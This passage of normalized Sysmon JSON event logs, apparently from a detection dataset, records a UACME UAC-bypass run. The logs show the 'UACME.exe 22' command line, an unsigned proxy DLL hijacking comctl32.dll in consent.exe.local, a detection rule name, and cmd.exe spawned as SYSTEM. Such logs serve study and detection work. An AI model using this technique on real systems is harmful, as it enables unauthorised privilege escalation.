Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 7564 -s 152\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1B59C8D752E031AF4C6B0B02F3780E7156AAEECF,MD5=603A88C6EC5CA36FC9C382F9A2EA9105,SHA256=DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955,IMPHASH=3B9DE67ACC19291D79083D12452FA5BA\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ParentProcessId\",\"text\":\"7564\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\WerFault.exe -u -p 7564 -s 152", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\werfault.exe", "object.process.guid": "747f3d96-7935-5d45-0000-001066ca0701", "object.process.hash.imphash": "3B9DE67ACC19291D79083D12452FA5BA", "object.process.hash.md5": "603A88C6EC5CA36FC9C382F9A2EA9105", "object.process.hash.sha1": "1B59C8D752E031AF4C6B0B02F3780E7156AAEECF", "object.process.hash.sha256": "DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955", "object.process.id": "7324", "object.process.meta": "Description:Windows Problem Reporting | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "werfault.exe", "object.process.parent.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.parent.id": "7564", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:21.036Z", "type": "raw", "uuid": "d6803be2-c89f-4b40-acdb-cf8c80989d3f"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:21.1282657Z\"},\"EventRecordID\":\"5449\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:20.686\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010cab90701}\"},{\"Name\":\"ProcessId\",\"text\":\"7564\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC500\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC500", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7934-5d45-0000-0010cab90701", "object.process.hash.imphash": "522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7564", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.266Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:20.686Z", "type": "raw", "uuid": "7b523ccd-78ce-4af3-8d35-9273f3f6a8da"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:20.7314164Z\"},\"EventRecordID\":\"5448\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:20.405\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7934-5d45-0000-0010a2a40701}\"},{\"Name\":\"ProcessId\",\"text\":\"4964\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" \"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5336\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"UACME.exe 22\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", "object.process.guid": "747f3d96-7934-5d45-0000-0010a2a40701", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "4964", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.parent.cmdline": "UACME.exe 22", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.parent.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.parent.id": "5336", "object.process.parent.name": "uacme.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:20.405Z", "type": "raw", "uuid": "a47d229a-2311-48b1-a1ed-bdd13d9c59e0"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:19.9151203Z\"},\"EventRecordID\":\"5447\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:19.888\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7933-5d45-0000-0010227e0701}\"},{\"Name\":\"ProcessId\",\"text\":\"6000\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4740\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-7933-5d45-0000-0010227e0701", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "6000", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "consent.exe 896 318 0000028064471300", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.parent.id": "4740", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:19.888Z", "type": "raw", "uuid": "b0eb41f3-3f63-4905-ba70-8743cd7bce72"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:19.8880688Z\"},\"EventRecordID\":\"5446\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3680\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - DLL Hijack - UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:19.877\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4740\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ImageLoaded\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\\\comctl32.dll\"},{\"Name\":\"FileVersion\",\"text\":\"3.1.8.1904\"},{\"Name\":\"Description\",\"text\":\"UACMe proxy DLL\"},{\"Name\":\"Product\",\"text\":\"UACMe\"},{\"Name\":\"Company\",\"text\":\"Hazardous Environments\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\"},{\"Name\":\"Signed\",\"text\":\"false\"},{\"Name\":\"Signature\"},{\"Name\":\"SignatureStatus\",\"text\":\"Unavailable\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - DLL Hijack - UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\comctl32.dll", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha1": "A309A622B9D4A62CFE59B73FDD32BD8384E66628", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "747f3d96-7930-5d45-0000-001055de0601", "subject.process.id": "4740", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:19.877Z", "type": "raw", "uuid": "96aa7248-d4dd-4f79-96d5-69b12da589c5"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.8537652Z\"},\"EventRecordID\":\"5445\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.578\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001085ee0601}\"},{\"Name\":\"ProcessId\",\"text\":\"6388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\WerFault.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Problem Reporting\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 4740 -s 128\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1B59C8D752E031AF4C6B0B02F3780E7156AAEECF,MD5=603A88C6EC5CA36FC9C382F9A2EA9105,SHA256=DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955,IMPHASH=3B9DE67ACC19291D79083D12452FA5BA\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001055de0601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"4740\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"consent.exe 896 318 0000028064471300\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\WerFault.exe -u -p 4740 -s 128", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\werfault.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001085ee0601", "object.process.hash.imphash": "3B9DE67ACC19291D79083D12452FA5BA", "object.process.hash.md5": "603A88C6EC5CA36FC9C382F9A2EA9105", "object.process.hash.sha1": "1B59C8D752E031AF4C6B0B02F3780E7156AAEECF", "object.process.hash.sha256": "DFAE5391EA274620F2B025976DC9787051EE416AEB360F68F20B108323924955", "object.process.id": "6388", "object.process.meta": "Description:Windows Problem Reporting | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "werfault.exe", "object.process.parent.cmdline": "consent.exe 896 318 0000028064471300", "object.process.parent.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.parent.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.parent.id": "4740", "object.process.parent.name": "consent.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.578Z", "type": "raw", "uuid": "5c42d076-4c0d-491a-9196-39f2693106e3"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.7537753Z\"},\"EventRecordID\":\"5444\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 